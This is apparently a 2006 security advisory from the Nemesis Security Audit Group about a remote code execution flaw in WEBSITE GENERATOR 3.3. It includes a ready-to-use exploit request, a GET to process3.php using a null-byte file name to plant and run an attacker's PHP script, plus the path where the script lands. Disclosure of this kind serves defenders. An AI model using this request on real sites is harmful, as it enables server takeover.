NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3
Advisory:
NSAG-№202-25.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
WEBSITE GENERATOR 3.3
Site of manufacturer:
http://freehostshop.com
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/894.html
Risk:
Hide
Description:
The removed user, can upload php script from other server and execute
custom php code on webserver.
Exploit:
Method GET:
http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]=
Link:
http://example.com/files/myforms/forms/attack.php
More information:
http://www.nsag.ru/vuln/894.html
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.